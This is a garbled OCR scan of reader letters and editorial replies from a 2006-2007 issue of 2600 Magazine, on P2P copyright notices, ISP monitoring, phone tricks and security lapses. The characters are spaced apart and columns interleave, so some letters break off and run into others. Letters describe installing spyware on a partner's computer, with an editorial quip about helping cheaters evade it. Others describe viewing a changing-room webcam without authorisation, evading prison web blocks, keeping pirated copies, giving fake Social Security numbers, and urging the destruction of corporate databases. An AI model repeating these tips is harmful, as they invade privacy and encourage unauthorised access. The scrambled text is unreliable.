The Swedi sh Hi gh Court has acqui tted a 29-
year-ol d mal e for shar i ng fi l es over a P2 P network.
The reason was that the onl y "proof" avai l abl e were
screenshots, which the court says i s not enough.
Fi nal l y! I ' ve heard of many bei ng convi cted
thanks to screenshots and I got horri fied each and
every ti me. Screenshots aren' t proof. Those screen
shots coul d easi l y be fabri cated or si mpl y be from an
enti rel y di fferent computer. Just wanted to share what
I see as very good news.
aft
Pge 40 2600 Magazine
Keep in mind that this instance of justice occurred
in Sweden, which is about as likely to have an effect
on the u. s. judicial system as Pluto.
Revolution
Dear 2600:
I possess a great fondness for obtai ni ng knowl
edge and executi ng creati vi ty. Though my i nterests
stretch wide, my mai n i nterests are mathemati cs,
physi cs, el ectroni cs, and of course computer sci ence.
I am currentl y 19. Around the ti me peri od my age
morphed to 1 8, I contai ned a paranoi a that di sabl ed
me from creati ng and experi menti ng. Thi s t i me frame
was terri bl e. I vi ewed an extremel y corrupted soci ety,
a soci ety where humans were sued for creat i ng soft
ware that fel l under a usel ess patent, a soci ety where
curi osi ty was frowned upon, etc. I am sl owl y fi ght i ng
t hi s evi l paranoi a and cont i nui ng my previ ous
events.
I was i nspi red to produce thi s l etter after readi ng
the fol l owi ng secti on from t he "Congressi onal Testi
mony of Emmanuel Gol dstei n" on totse. com:
" I would like to close by cautioning the subcom
mittee and all of us not to mix up these two very
distinct worlds we are talking about, the world of
the criminal and the world of the experimenter, the
person that is seeking to learn. To do so will be to
create a society where people are afraid to experi
ment and try variations on a theme because they
might be committing some kind of a crime, and at the
same time further legislation could have the effect of
not really doing much for drug dealers and gangsters,
who are doing far more serious crimes than making
free phone calls, and it is not likely to intimidate them
very much. "
We need a revolution.
aRevolutionist
It was almost as if Congress was given a road map
of what not to do which they then decided to do
anyway.
Clarification
Dear 2600:
In reference to sc's l etter in 23: 2 I woul d l i ke to
hel p out al l the musi ci an hackers amongst us who
woul d l i ke hel p t uni ng t hei r i nstruments wi th more
than j ust an " F" . Actual l y, al l over the wor l d the concert
tuni ng note is "concert A, " whi ch converts i nto 440
hertz. Most symphoni c orchestras keep i ncreasi ng
t hi s standard tuni ng note due to an i ncrease i n rel a
ti ve br i l l i ance of sound, especi al l y Ameri can orches
tras. To make a l ong story short, l ucki l y i n the western
wor l d ( meani ng west Europe) you wi l l fi nd an 880
hertz di al tone. 50 maybe i f there are any more vari a
ti ons of di al tones i n some deserted parts of the worl d,
gui tar pl ayers wi l l be abl e to t une al l of thei r stri ngs
wi thout even usi ng t hei r ears. What a bummer that
was anyhow!
jazzlupO
Duly noted.
Dear 2600:
Thi s is in response to l upO' s l etter i n 23: 3. Thi s i s
a possi bi l i ty s i nce I had a s i mi l ar experi ence and I
am ass umi ng t hi s si nce you l i sted the ports as bei ng
6881-6999 whi ch are Bi tTorrent ports. The company
that owns the copyri ght mater i al may have actual l y
tri ed t o downl oad t he shared copy from you and sent
your 1 5P a Cease and Desi st l etter or maybe even an
emai l .
Te Joker
Dear 2600:
In response to l upO' s l etter in 23 . 3, I woul d l i ke
to poi nt out t hat i n fact Cox is not moni tori ng the
connecti on' s packet payl oad, but merel y the amount
and type. I am not defendi ng Cox i n the l east ri ght
now. They are moni tori ng ( I ' ve been shut off before
for host i ng http servi ces and bei ng one of the reasons
they di sabl e host i ng on port 80). However there i s
one thi ng that l upO forgot to menti on or di dn' t read.
The emai l he was sent shoul d have very speci fi cal l y
menti oned whi ch files he was i nfri ngi ng wi th, hi s I P
the ti me, a n d the protocol he was usi ng to transfer. Al l
t hi s actual l y comes from an authori zed representati ve
of the movi e company. l upO was not caught by Cox;
he was caught by the movie company.
Here' s the tri ck, j ust so you know: They (the
movi e company' s hi red spi es) share the movi e them
sel ves after they downl oad the pi rated copy from us
( t he peopl e), check i t, veri fy i t ' s the actual movi e.
These movi e compani es are paying peopl e to share
the movi es and wri te down our I P addresses, t i me,
date, fi l es. Here' s my workaround: I n the emai l that I
received, they (the movi e company) requested that the
offendi ng fi l es be removed from my system. Al l these
were . R## fi l e parts. They never sai d anythi ng about
what was contai ned wi thi n them! 50 I unpacked,
burned to a CD, put on the network dri ve, and kept a
copy of the AVI ( remember, not l i sted as offendi ng) on
my computer, and di d as requested. Here' s sti cki ng
i t to the movi e compani es' bad movi es, shar i ng
spi es, and stupi d l awyers for thei r awfu l wordi ng of
the emai l , and forgett i ng to l i st "And contai ned data
wi thi n l i sted fi l es. "
Cynagen
We suspect they were most interested in you
removing the fles from public access, not whether or
not you held onto a copy as a souvenir.
Dear 2600:
In regards to l upO' s l etter in 2 3 : 3, the 1 5P is l i kel y
tel l i ng the truth. I work at an 1 5P and occasi onal l y
we recei ve abuse compl ai nts. These compl ai nts detai l
a ti me a n d I P address, and i ndi cate that the user of
that IP at that t i me was "doi ng somet hi ng bad" (they
gi ve detai l s) . I n most cases, i t ' s j ust an i nfected box
probi ng ports or part i ci pati ng in a 0005 or some
t hi ng. However, once in a whi l e, the IP address and
ti me arri ve wi th D descri pti on of a copyri ghted work or
pi ece of software that was al l egedl y bei ng i nfri nged. I
bel i eve it works l i ke t hi s:
Winter 2006-2007Pa
g
e 41
Copyri ght hol der ( RI AA or MPAA or MS) or
someone they hi red tel l s the i ntrusi on detecti on
group of the i nfri ngement. I ntrusi on detecti on group
tel l s the I SP. I SP takes acti on or i gnores i t.
The I SP's moti vati ons are presumabl y j ust keepi ng
t hei r bandwi dth bi l l s manageabl e. The i nteresti ng
t hi ng i s that i f t he I SP i s not actual l y i nvadi ng your
pri vacy, they are taki ng your accuser at thei r word,
l i kel y wi thout any evi dence except for possi bl y l arge
bandwi dth usage. It mi ght be i nteresti ng to ask the
quest i on: Can an I SP l egal l y take acti on agai nst you
based on the second- or th i rd-hand word of a copy
ri ght hol der? Shoul d they be abl e to?
G
Dear 2600:
In 23 : 3, l upO wrote about hi s I SP bl ocki ng I nternet
access due to fi l e shari ng and bei ng abl e to name the
fi l es that were bei ng downl oaded, but sti l l sayi ng they
do not eavesdrop on thei r cl i ents' traffi c. Qui te u nder
standabl y, l upO experi enced some doubts about t hi s.
As I work at an I SP abuse desk i n Europe, I bel i eve I
can shed some l i ght on what happened.
I n 1 998, the Uni ted States Senate passed a qui te
stri ct copyri ght l aw cal l ed the Di gi tal Mi l l enni um
Copyri ght Act ( DMCA) . Ti tl e I I of DMCA, t he Onl i ne
Copyri ght I nfri ngement Li abi l i ty Li mi tati on Act,
creates a "safe harbor" for onl i ne servi ce provi ders
agai nst copyri ght l i abi l i ty i f they adhere to and
qual ify for certai n prescri bed safe harbor gui del i nes
and promptl y bl ock access i f they recei ve a noti fi ca
ti on from a copyri ght hol der or thei r agent. What t hi s
means i n practi ce i s t hat unl ess I SPs act when they
are noti fi ed of copyri ght vi ol ati ons, they are al so hel d
l i abl e.
Some l arge copyri ght hol ders (typi cal l y medi a
compani es l i ke Uni versal Studi os, Pramount, Sony
Pi ctures, etc. ) have hi red the servi ces of a company
cal l ed BayTsp i n Los Gatos, Cal i forni a. BayTsp runs
computers on DC++, Bi tTorrent, eDonkey, etc.
networks, l i steni ng to traffic and noti ng shar i ng of
items owned by t hei r cl i ents. They then contact the
I SP with the i nformati on, whi ch i ncl udes ti me stamps,
fi l e names, s i zes, protocol s, and I P addresses . Some
copyri ght hol ders do very s i mi l ar thi ngs at thei r own
operat i on.
Thus, l upO' s I SP probabl y di dn' t eavesdrop on
thei r cl i ents and are forced under very severe penal
ti es to take the acti on they di d.
I n the country where I work, pri vacy l aws
currentl y prevent us from havi ng to hound our cl i ents
in t hi s manner, but t hi s may change in the future si nce
s i mi l ar European l egi sl ati on ( EUCD) has been passed.
I recommend consul t i ng Wi ki pedi a whi ch has qui te
good arti cl es on these l aws.
Eric Smith
The fi rst of these was a l etter sent in from l upO
where hi s I nternet provi der (Cox) had suspended hi s
I nternet access for downl oadi ng. He was concerned
that hi s provi der i s moni tori ng every packet he sends
out. Thi s i s hardl y the case. I n si tuati ons where peopl e
downl oad us i ng Torrent systems or P2 P systems
wi thout maski ng thei r I P somehow, the MPAA or the
movi e' s producers wi l l occasi onal l y send a l etter to
the ISP stati ng that "the user wi th t hi s IP address was
downl oadi ng t hi s fi l e ( e. g. , Mission Impossible 3
DI Vx. AVI J at t hi s t i me. Pl ease take acti on to ensure
that shari ng of t hi s fi l e by t hi s user is stopped. Thank
you. " I t ' s been a l i ttl e whi l e s i nce I ' ve seen one come
i n so they mi ght not be as vi gi l ant about i t anymore.
The second l etter I wi sh to respond to was
someone i n the UK who had ordered a phone l i ne
and DSL, then cancel ed hi s phone l i ne and remai ned
on DSL. I know here i n Canada where I l i ve t hi ngs
may be di fferent but how i t works i s our tel ephone
compani es are i ncredi bl y l azy. The anal og si gnal
(voi ce) on your l i ne can be turned on and off at t he
fl i ck of a swi tch essent i al l y. The di gi tal si gnal ( DSL
data) however i s not as easy t o turn on and off. The
phone company physi cal l y has to add and remove a
card i n the central office every t i me someone ei ther
subscri bes to or cancel s DSL servi ce. Thi s on occa
si on has al l owed a di gi tal si gnal to remai n acti ve on
a dead tel ephone l i ne for up t o a year and a hal f i n
my experi ence.
01 003
Dear 2600:
I j ust fi ni shed readi ng the arti cl e " Never Py For
Wi Fi Agai n! " in 23: 3. The author said that Appl e
removed the abi l i ty to change one's MAC address
si nce Jaguar. Thi s i s not true but they di d make i t a bi t
harder. There i s a si mpl e program cal l ed Spoof MAC
that wi l l spoof your MAC address properl y wi th 1 0. 4+
ppe machi ne ai rport extremes. I am not sure i f t hi s
wi l l work on I ntel machi nes. I f you prefer the ol d
fashi oned way, a Googl e search wi l l show you how.
To any other Mac users who found t hi s arti cl e i nter
est i ng pl ease stop by #ki smac on freenode.
BugDave
Proclamation
Dear 2600:
I am a patriot. I send i nfo and bucks to peopl e i n
t he gu l ag. I do not know how t o type and therefore
cannot hack. But I ' m very i nterested in acqui ri ng any
and al l i nformati on I can on al l subj ects. Knowl edge
i s power. I f the sheepl e bel i eve that thei r el ected offi
ci al s have t hei r best i nterest at heart, then l et them
fol l ow the J udas goat to s l aughter. The truth i s that
you
g
el the government you deserve' I f you wi l l read
the consti tuti on of the Uni ted States you wi l l see that
our foundi ng fathers decl ared that we were born
Dear 2600:
wi th certai n ri ghts that under no ci rcumstances can
I feel I shoul d repl y to a coupl e of the l etters
be revoked. Yet they conti nual l y chi p away at these
in 2 3 : 3 as I work for an ISP and have the abi l i ty to
ri ghts. One right i s the right to keep and bear arms.
answer these.
Thi s has nothi ng to do wi th hunti ng and everythi ng to
Pa
g
e 42 2600 Ma
g
azine
do wi tb overtbrowi ng an oppressi ve government! They
have now enacted l aws that gi ve them the autbori ty
to come and confi scate your guns if someone merel y
put s a restrai ni ng order on you . Thi s means t bat they
don't even need evi dence of a cri me, much l ess a
convi cti on ! So I cal l upon those who have eyes to
see and ears to hear to wi thhol d revenue from the
scumbags any way possi bl e. Be i t gett i ng free stuff
or servi ces from the big corporate i nsti tut i ons to not
report i ng i ncome or even destroyi ng thei r databases!
Candycone
South Dakota
We're not going to be starting a Second Amend
ment interpretation discussion here. But if you believe
what you say when exactly will you be using your
guns to help overthrow the oppressive government
which you obviously have strong feelings about? If
thats what they're supposed to be used for, when
does the overthrow start and who decides? We admire
people who stand up for what they believe in but you
seem to be using your dissatisfaction as an excuse to
steal and cause havoc without a clear objective. What
good will come of that?
Information
Dear 2600:
Check out http://i rrepressi bl e. i nfo - a campai gn
agai nst censorshi p on the I nternet. And the fact that
Amnesty I nternat i onal i s l eadi ng the campai gn actu
a l l y gi ves me hope that peopl e j ust mi ght start to l i sten
to what a l ot of us has been shouti ng for so l ong.
Anders
Dear 2600:
Hel l o my brothers and si sters of the di gi tal under
ground. I am wri ti ng t hi s i n response to a previ ous
arti cl e or l etter whi ch I read i n another i ssue but
unfortunatel y that i ssue i s fl oat i ng around my
personal l i brary somewhere and cannot be found.
The arti cl e I ' m referri ng t o actual l y tal ked about
usi ng 71 1 or rel ay cal l i ng to make col l ect cal l s from
pri son. I thought t hi s was i nteresti ng hecause i t's ki nd
al l ow users t o i nsta l l . exe fi l es, I woul d suggest usi ng
t he AI M Express websi te t o l ogi n. Pl us there i s a hack
to add AI M contacts to your Gmai l Gtal k l i st s i nce
they both use Jabber l ogi ns. Thi s i s j ust a random
thought from someone who works tech support for a
l i vi ng and is unhappy wi th the current pol i t i cal condi
ti on and hopes that i t wi l l save some peopl e some
money from the very greedy phone compani es. The
Gtal k hack can be found in a book enti tl ed Google
pedia. Enjoy and happy rel ayi ng!
soursoles
While we think its a great idea, we know of no
prison that actually allows its inmates this kind of
access on the net. It would certainly make the Interet
a much more interesting place if they did. Regardless,
something needs to be done about the horrible rip
offs prisoners' friends and families must endure at the
hands of those phone companies which charge exor
bitant collect call surcharges. Communications costs
have gone way down acrms the board. Its unconscio
nable that rates many times higher are being charged
to those who have very little choice in the matter.
Dear 2600:
I di d some work wi th a l ocal tel ephone PBX
i nstal l er and noti ced the tech di al ed " 1 01 1 1 " on thei r
buttset to gi ve the phone l i ne the tech was connected
to, aka di al ed the ANAC. I tested t hi s here in Mai ne
and i t works onl y on Veri zon l andl i nes, not on Veri zon
payphones.
Hawk82
Dear 2600:
Check out t hi s pay servi ce - http://www. spoofcard.
coml - cal l t hrough them vi a PI N and you can enter
any number you woul d l i ke to appear as Cal l er 1 0
and choose a di fferent voi ce for yoursel f. Hmmm . . .
t he possi bi l i ti es !
Doda McCheesle
This was demonstrated on " Of The Hook" some
months back and has provided many hours of enter
tainment ever since.
of crazy what they charge the fami l i es and fri ends
Dear 2600:
of the i ncarcerated. I hear that pri soners someti mes Fi rst keep up the awesome publ i cat i on. I read it
have access to computers that have active I nternet
to stay sane.
connecti ons. I f thi s i s true they coul d eas i l y create I was frequenti ng one of my favori te forums when
an AI M (AOL I nstant Messenger) screen name and
I happened upon a l i nk to http://www. pri vatephone.
add the screen name MYI PRELAY to thei r buddy l i st
com. Thi s i ntri gued me beyond bel i ef. The way i t
and use the rel ay servi ce to make cal l s to whomever
seems to work is that you cboose a state, an area
they needed to. Thi s not onl y al l ows you to make cal l s
code, and then a ci ty. I t ' l l generate a number for those
at ti mes you mi ght not normal l y be abl e to, but i t
speci fi cati ons and then al l you need to do i s provi de
avoi ds i ncurri ng any col l ect cal l fees. After addi ng the
a val i d emai l address for t hi s messagi ng service to
MYI PRELAY to your l i st you can type in the fol l owi ng:
work. Thi s seems extremel y i nteresti ng and l ooks l i ke
di al xxxxxxxxxx. Repl ace the x' s wi th the tel ephone
a l ot of fun cou l d ensue, especi al l y al ong the l i nes of
number you're cal l i ng and the operator on the other
remai ni ng anonymous i n thi s day and age when that ' s
end wi l l make the cal l for you t o t he desi red party.
becomi ng i ncreasi ngl y harder.
Now i f the faci l i ty the pri soner i s in bl ocks the AIM
I wou l dn' t mi nd some more i nformati on on t hi s
Express websi te, i t's ti me t o use an ol d workaround,
servi ce i f anyone out there knows anythi ng about i t.
a proxy server such as www. proxi fy. com or www.
And I certai nl y bope I ' m not poki ng at somet hi ng that
thecl oak. com. Si nce these pri son systems may not
bas al ready been di scussed. Though I don ' t bel i eve
Winter 2006-2007Pa
g
e 43
that I am.
Crapinaple
These services are popping up all over. The result
is a phone network that has almost no similarity to
the one where geography actually meant something.
Now we can each have dozens of phone numhers
from all parts of the country and confuse the hell out
of people who want to know where we really are.
Dear 2600:
I di d a bunch of favors for some of the guys at
work and they wanted to take me out for l unch. They
l et me choose the pl ace. I chose a stri p cl ub that
actual l y has pretty good food and, of course, good
scenery. Looki ng at the food menu I noti ced that they
had a websi te and a secti on where for a pri ce you can
l ook at the gi r l s i n the l ocker room vi a a webcam ( no
sound) . I found an unsecured way to access i t wi thout
even havi ng to get on thei r websi te.
My questi on i s whether or not thi s woul d be
somethi ng that you woul d l i ke me to wri te about and
post the mms address? I f not, I can send you the three
webcam l i nks for your personal enjoyment.
Al so, I have an entertai ni ng story about my ex-gi r l
fri end who I bui l t a computer for (speci al computer
wi th spyware i nstal l ed) . I found out about her cheat i ng
on me wi th a very wel l known Hol l ywood movi e star.
( Hi nt: he is known for a very expensi ve fl op that cost
about 1 80 mi l l i on dol l ars and was about water. )
Jayster
The wehcam thing isn't exactly the hack of the
century hut if you can put together an article that
details how you were ahle to track down the alterna
tive method of access, it could certainly he useful for
many diferent applications. As for the spyware story,
perhaps you could outline how your ex-girlfriend
might have heen ahle to get around your surveillance
if she suspected that you might he onto her. Some of
our readers would like to continue cheating on their
significant others without having to worry
Observation
Dear 2600:
As al ways I wai t the months for your magazi ne to
arrive and then wi thi n a coupl e of days i t ' s over. Thi s
ti me I have somethi ng to contri bute.
I work for Tel us Tel ecommuni cati ons i n BC
Canada. I am a servi ce tech doi ng i nstal l s and
repai rs. A whi l e back I had a j ob to go to a customer
because they coul dn' t get thei r ADSL to work. Now
the customer had j ust bought a new computer from
Stapl es and Tel us had hooked ADSL up i n the CO, so
normal l y there shou l dn' t be a probl em. The customer
i s gi ven fi l ters for thei r phones and an i nstructi on CD
for software i nstal l s and setup.
One t hi ng they have t o do i s regi ster thei r MAC
address wi th our OCA server. Th i s customer was n' t
any troubl e regi steri ng thei r MAC addy or bei ng abl e
to surf onl i ne. The customer was happy and I l eft.
The next day I got a cal l back. They coul dn' t surf.
After pl ayi ng around checki ng the setti ngs and not
fi ndi ng anythi ng wrong, I cal l ed our support group
to see i f somethi ng i n the software was changed. La
and behol d we found that the same MAC address was
regi stered in another part of the provi nce.
Now we al l thought that every MAC address was
supposed to be uni que. I i nstructed the customer to
take the computer back for a new NI C card. They were
tol d that the computer woul d have to be returned to
HP for the change to take pl ace and i nstead sol d them
a router. The router sol ved thei r probl em and they
were agai n happy customers.
I am guessi ng that thi s was a uni que and one
ti me error or that the NI C cards were cori ng out of a
country new to t hi s type of market i ng such as Chi na.
I ' m not s ure what t he answer i s but i t was a fl uke that
the support tech deci ded to l ook up the MAC regi s
trati on because they normal l y don' t l ook that deep
or far.
Adelain
Dear 2600:
I have a I i ttl e story about the Manchester ( New
Hampsh i re) Pol i ce Department.
About two weeks ago the l ocal chapter of Easter
Seal s NH was havi ng an I D Card Ni ght for ki ds wi th
ASD and PDD ( Auti sm Spectrum Di sorder and Perva
si ve Devel opmental Di sorders). My son i s mi l dl y
auti sti c ( maybe he wi l l crack t he NSA' s encrypti on
code! ) . Anyway, there was a ni ce pol i cewoman who
took us out for a l i ttl e tour of the pol i ce cr ui ser. I was
wateri ng at the mouth - pol i ce radi o, pol i ce radar,
and, most of al l , onboard computer! As far as I cou l d
tel l ( hands-off of course), I t hi nk i t s as was ei t her
Wi ndows NT Embedded or Wi ndows CE :. x ( l ooki ng
at the i nterface) . Mor e than l i kel y NT Embedded.
Now for the fun part. I sai d to the ni ce pol i ce
woman, " Hey, can we see the computer? My son
l oves computers. " "By al l means, " she sai d. She pul l ed
the styl us (Jut of the hol der and tapped the screen.
The screensaver went t o the standard Wi ndows l ogon
screen. The username was si mpl y "mpd" ( Manchester
Pol i ce Department, I assume) . She l eft the password
bl ank and hit the " l ogon" button. Wow! !
The i nterface care t o l i fe. On the screen was an
i nterface for anything. You name i t. Dri ver ' s l i cense
l ookup, l i cense tag l ookup, CPS coordi nates of the
cr ui ser. The i nformati on! I actual l y had to keep my
hands at my si des, i t was so tempti ng. Now what
real l y fri ghtens me i s that the car was unl ocked and
out of vi ew. So what was to stop anyone wi th hal f
a brai n gett i ng al l of the j u i cy i nformati on t hat Bi g
Brother had?
So much for securi ty.
abl e to do t hi s and took the computer back to Stapl es,
Zaphod
whi ch was an hour's dri ve from the town they l i ved
We imagine even half a brain would he sufcient
i n.
to steer someone away from messing with a police
l When I got to the customer's house I di dn' t have
car. We wonder what checks and halanccs arc in
-Pa
g
e 44 2600 Ma
g
azine
place to prevent abuse of this system by both autho
rized and unauthorized parties. Imagine a cop who'
also a stalker and the risks become all too clear.
Dear 2600:
I recentl y di d some travel i ng in japan and I was
struck by the di fferences in ai rport securi ty there
versus here. The securi ty offi cers i n japan cl earl y took
thei r j ob seri ousl y and di dn' t appear both in physi cal
appearance and body l anguage t o have made t he
choi ce of worki ng ai rport securi ty over worki ng at
McDonal d's. What was most i mmedi atel y obvi ous
was the number of X-ray machi nes. I had travel ed
t hrough both DFW and LAX on my way to j apan and
nei t her ai rport had more than two X-ray machi nes
operati ng at any ti me resul t i ng i n a huge l i ne, frus
trated passengers, and overworked guards. j apan had
ni ne X-rays goi ng at al l three ai rports I went to there.
But the most i ntri gui ng t hi ng I saw that prompted me
to wri te t hi s letter was a l i qui d testi ng machi ne they
have. They al l ow passengers to take l i qui ds on fl i ghts
domest i cal l y and i nternati onal l y unl ess that travel i s
t hrough U. S. ai rspace. They have a machi ne that i s
about 1 8 i nches tal l and has two C shaped openi ngs.
At the base of these two openi ngs i s a metal pl ate of
what l ooked l i ke t i n. I pl aced my dr i nk on the openi ng
for pl asti c bott l es (the other i s for metal contai ners)
and afer a few seconds a green l i ght came on and I
was a l l owed to keep my dr i nk. I wanted to l earn more
about the devi ce but the onl y Engl i sh on it was what
appeared to be a company l ogo wi th the l etters GTC
and i roni cal l y the on/of swi tch. As i t was expl ai ned
to us, forei gners have absol utel y no ri ghts i n japan so I
was hesi tant to take a photo of the devi ce. If anybody
knows anythi ng about t hi s machi ne, wri te an art i cl e.
I want to l earn more about i t. I t obvi ousl y was n' t new
so i t wasn' t i n response to anythi ng recent.
G8M7601 0
Japan is the place to go if you want to see weird
machines that know what they're doing. If you just
want to see confused people who have no clue what
they're doing, a trip to a domestic airport will be most
rewarding.
Dear 2600:
I tri ed to l og onto my Key Bank onl i ne account and
di scovered a new securi ty "feature. " Al l computers
l oggi ng on now are requi red to be regi stered to access
the si te. Accordi ng to the representati ves I ' ve spoken
wi th, t hi s entai l s onl y a l oggi ng of my I P address. To
regi ster I must provi de my ATM card number, PI N( ! ),
and debi t card i ssue number. How many cl uel ess
Wi Fi users are goi ng to have thei r i denti ty stol en
because of t hi s "feature?" There i sn' t even a warni ng
about accessi ng account i nformati on over Wi Fi . Why
are the peopl e charged wi th our securi ty al ways so
cl uel ess about what securi ty real l y i s?
8rian
i nto the twi n towers. I t can be seen i n the "covers"
secti on of www. 2600. com.
By the way, I t woul d be rad i f you guys di d a retro
cover one of these quarters.
knotnaught
We were hoping this wouldn't come up. And now
we're probably going to have to reprint those 7 987
issues. As for the retro stuff, perhaps in the future.
Dear 2600:
I want to t hank you and Arcade One for rai si ng
my sense of paranoi a. The other day I went out t o get
some l unch so, whi l e I was out, I deci ded to stop by
the bookstore to get the new Fal l i ssue of 2600. After
standi ng in l i ne for 20 mi nutes due to the i ncompe
tence of the bookstore cashi er, I found mysel f rushed
to get l unch and get back to work. I deci ded Panera
Bread was the best choi ce si nce it was cl ose by and i t
was cl osest t o my workpl ace.
I had never been i nsi de any Pnera Bread pri or to
thi s vi si t. There were j ust a few peopl e i n l i ne si nce i t
was onl y 1 1 am. So whi l e I stood there, I pul l ed out
the i ssue and started to read the arti cl e " I denti ty Theft:
Mi si nformati on Can Be Your Fri end" by Arcade One.
Eventual l y i t was my turn to order, so I bl urted out
my order and returned to my readi ng. Then I heard
the cashi er ask, "What' s your name?" I froze. There
must have been an obvi ous, shocked look on my
face because the cashi er s ni ckered. At fi rst I thought
she mi ght be tryi ng to hi t on me, but then I real i zed
she real l y wanted to know my name to compl ete
the transact i on. I asked mysel f, "Why am I requi red
to gi ve my name to purchase a sandwi ch? " Al l sorts
of thoughts raced t hrough my head and when she
asked the second t i me I knew I had to say somethi ng,
because by that t i me peopl e were start i ng to get i n
l i ne behi nd me. So, i n desperati on I pul l ed out a hack
I had used for years agai nst Radi o Shack. I l i ed and
sai d my name was Mi ke. The cashi er entered the data
i nto the computer/cash regi ster and handed me my
ti cket. The name " Mi ke" was pri nted on the recei pt
next to the ti cket number.
My heart was actual l y raci ng as I stood by the
pi ck-up area of the counter. What i f they asked for I D
t o prove that I was t hi s strangel y behavi ng " Mi ke" who
had ordered thi s very sandwi ch i n quest i on? What i f
another Mi ke, or God forbi d, two Mi kes, Mi kes who
had tol d the truth, had gotten i n l i ne behi nd me and
were now approachi ng the pi ck-up counter? What
i f they took my sandwi ch? Woul d my sandwi ch di e
because I l i ed?
After a few mi nutes I heard a cal l for " Mi ke! " , so I
grabbed the food, j ust gl ad I had asked for it "to go. "
As I opened t he door I fel t t hi s r us h of adrenal i ne,
as i f I had commi tted some cri me and gotten away
wi th it. By the ti me I got back to the car the rush
di sappeared. I real i zed that Pnera Bread was prob
abl y usi ng the name method to keep from mi xi ng
Dear 2600: up the orders or personal i zi ng the experi ence, but
I was j ust l ooki ng t hrough the 2600 cover archive then woul dn' t the uni que ti cket number suffi ce? I
and noti ced i n May 1 987 a pl ane was depi cted fl yi ng al so found mysel f wonderi ng what happened to that
Winter 2006-2007Pge 45
data the cashi er entered. Di d i t go to a central server?
How long woul d i t be kept? What i f I had said my
name was Osama? What i f I had refused to gi ve a
name? I t hi nk what I shoul d have done was to have
asked why they requi red my name at al l , but I was
too embroi l ed in conspi racy theories to have thought
of that opti on. However, you mi ght want to try i t for
yoursel ves, 2600. I ' m not sure i f they al l do thi s and I
won ' t say whi ch one i t is, but the Panera Bread store
I vi si ted is l ess than 1 5 mi l es from the St. James, New
York address you l i st in your magazi ne.
Mi ke the Liar
We detect what may be a tinge of sarcasm here.
Nobody should be this afraid to give their name to
someone in order to get a sandwich. But you touch
upon a good point, regardless of whether or not it was
intentional. Lying is perfectly acceptable in such situ
ations. People give out way too much personal infor
mation to other people who not only don't require it
but who have no way on earth of verifying it in the
first place. The same holds true for the many enti
ties that ask for your Social Security Number. Unless
they are the government, a financial institution, or
someone who is planning on running a credit check,
any number will do as it is only used for verification
the next time you speak to them. We don't mean to
buy into the pervasive paranoia that insists on suspi-

cion of all those around us and thinks of trust as a

, four letter word. But at the same time, people need
to know they are free to be anyone they wish in a
sandwich shop or elsewhere.
Dear 26oo:
Last ni ght my gi rl fri end and I were at a l ocal Mei jer
super store. Most ti mes I ' l l j ust go to the regi ster
to check out. The empl oyees are usual l y fri endl y
enough. We were i n a bi t of a hurry t hi s ti me, so we
went to the U-Scan. I had some cash on me and she
had her debi t. I assumed that because after I put i n
my cash and the "other payments" opti on was sti l l on
the screen that the programmers of the U-Scan were
bri ght enough to fi gure out that i f a card is swi ped
to onl y charge the di fference. No di ce. I nstead, the
machi ne flips out! The under-trai ned empl oyee di dn' t
ask us what happened. He j ust si mpl y cancel ed the
order and pri nted a recei pt. Apparentl y the machi ne
di dn' t even record that I put money i nto i t. Or, if i t
di d, he del eted i t. Regardl ess, al l he di d to do thi s
was touch t he corner of t he screen, type 2 7, then
type 240. I ' m assumi ng one of the numbers i s a store
number and the other is hi s empl oyee I D. The menu
was very si mpl e; a monkey coul d navi gate through
i t. Wi th a bit of a di stracti on i t seems l i ke you coul d
start pri nti ng your own recei pts! Thi s i s steal i ng and
i l l egal s o don' t ! But i t ' s al ways fun t o pl ay wi th Mei jer
empl oyees.
chemdream
thi s. Tesco (and, to my knowl edge, ASDA too) have
j ust i nstal l ed a spate of "sel f-servi ce checkouts. " Thi s
i s qui te a new thi ng for the U. K. The suppl i er i s NCR,
and the model i s thei r " FastLane" system (http://www.
-ncr. com/en/productslhardwareJsa_sel fchk. htm) . I
haven ' t had a chance to try the usual "tap the four
corners" and other methods t o get t o setup screens.
I ' m sure that others have, but I have al ways been too
busy whi l st usi ng one to have a chance to. I have
noti ced thi s, however. When you choose to pay wi th
a credi t/debi t card, the system wi l l scan your card
but won' t ask for a PI N number nor a si gnature. You
swi pe your card and it wi l l j ust si t there and store the
number and charge your account (j ust l i ke the other
ti l l ( POS) systems do). Thi s i s quite worryi ng, as I ' m
sure you are al ready aware, from a ( i n)securi ty poi nt
of vi ew. I t i sn' t a di ffi cul t col l i gati on to say that "thi s i s
the most l axl y secured i di ocy ever to hel p fraudsters. "
I wonder what el se these esteemed devel opers wi l l
deci de t o thrust upon t he unsuspecti ng sheep-fl ock of
a publ i c that we have.
Keep your cards cl ose and thei r detai l s cl oser.
Marxc2001
Dear 2600:
Last year I deci ded that a regul ar cel l phone servi ce
pl an wasn' t for me anymore. I went to Radi o Schl ock
and bought a Ci ngul ar phone and a prepai d card wi th
cash. Because I coul d, I provi ded al l bogus i nfo for
t hi s phone ( name, home address, home phone, and
Soci al Securi ty Number). I decl i ned the request for a
photo ID and I wal ked out wi th a worki ng phone.
After a few weeks I real i zed that certai n peopl e
coul dn' t cal l me. From most tel ephones there was no
probl em but many phones from i nsi de and outsi de
the Ci ngul ar network woul d get a "thi s number i s
di sconnected" message. I knew that somethi ng i n
Ci ngul ar' s routi ng was messed up, probabl y from
someone previ ousl y havi ng thi s number and then it
bei ng di sconnected. I cal l ed tech support.
After four hours on the phone over three days
(not i ncl udi ng hol d ti me), Ci ngul ar attempted vari ous
hi gh-tech fixes to my probl em. The tech woul d bang
on thei r keyboard and then say, " Have your fri end
try to cal l you now. Di d i t work? No? OK. Hol d on. "
Repeat ad nauseam. I t was cl ear they real l y di dn' t
know what they were doi ng even as my cal l was esca
l ated hi gher and hi gher.
Fi nal l y the rep at the " hi ghest" l evel of escal ati on
tol d me, " I ' m goi ng to try one more thi ng and i f i t
doesn' t work, we' l l have to i ssue you a new SI M card
and new phone number. " Thi s was a bogus al terna
ti ve. Why not fix the probl em i nstead of wai ti ng for
t hi s number to be reassi gned to someone new where
the probl em coul d repeat i tsel f? Anyway, agai nst a l l
odds, Ci ngul ar' s " l ast chance" fix worked. " Great ! " I
thought. Probl em sol ved. In fact, as I woul d di scover
a few hours l ater, i t was "super-sol ved. "
Dear 2600: When usi ng a prepai d pl an the cel l phone receives
Greeti ngs al l . Further to my l etter in the l ast i ssue, a text message afer each cal l with the cost of the
I thought that you' d be i nterested i n heari ng about previ ous cal l and the current bal ance. The messages
'
